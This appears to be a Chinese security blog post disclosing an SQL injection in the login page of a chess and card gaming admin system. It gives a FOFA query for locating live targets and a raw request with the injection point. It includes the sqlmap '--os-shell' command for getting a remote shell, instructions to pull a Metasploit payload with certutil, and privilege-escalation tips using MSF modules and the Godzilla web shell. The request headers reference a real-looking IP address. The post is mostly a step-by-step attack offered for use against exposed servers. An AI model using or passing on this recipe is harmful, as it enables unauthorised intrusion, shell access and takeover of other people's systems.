登陆 注册

漏洞发布 | 棋牌某源码通杀注入直接反弹shell

Guy_Psycho 2020-09-13



直接上图

FOFA搜索词:body="棋牌后台管理系统" && title=="后台登录"


请求包


POST /Login/ValidateLogin HTTP/1.1
Host: 127.0.0.1:8001
Content-Length: 30
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://111.73.45.27:8001
Referer: http://111.73.45.27:8001/Login/index
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh-TW;q=0.9,zh;q=0.8,en-US;q=0.7,en;q=0.6
Cookie: Hm_lvt_8ee3ec23e73c6dcda2c7c9c489c151aa=1599407883; RYQIPAI=RYCacheKey=1&RYCacheKey_ETS=2020-09-07+00%3a28%3a17&VS=07a6f8746a60ecc3; ASP.NET_SessionId=udnrj5bxpuchvrf4fs4oute3; BT_PANEL_6=3a8e87d5-ad8a-4db2-9e57-c3a1684991e0._Tklm_sxRP6Gk0jcgXfEFwQVt9Y; Hm_lpvt_8ee3ec23e73c6dcda2c7c9c489c151aa=1599429027
Connection: close


userName=123*&password=321




使用方法


   上方请求包内的请求头Host参数修改成你目标域名或IP:端口,然后直接扔sqlmap执行:




sqlmap -r post.txt --os-shell


   即可获取交互shell,然后我们用win自带的certutil.exe下载msf生成的shell即可提权。


提权小思路

  • 使用MSF的UAC提权模块进行提权。

  • 使用“哥斯拉”菜刀工具的小模块进行提权加用户组。

  • 使用MSF工具的CVE漏洞模块进行提权。

注:经测试有些站点可直接拿system权限


    关于和掌控安全撞文章事情不存在谁抄谁,毕竟漏洞总不能只有一个人能挖出来,所以看热闹的和掌控安全的老哥勿扰。

请注意时间


Hi


扫二维码|关注我们


云闲|剑青

侠骨|初心

请发表您的评论
请关注微信公众号
微信二维码
不容错过
Powered By HeiBaiTeam.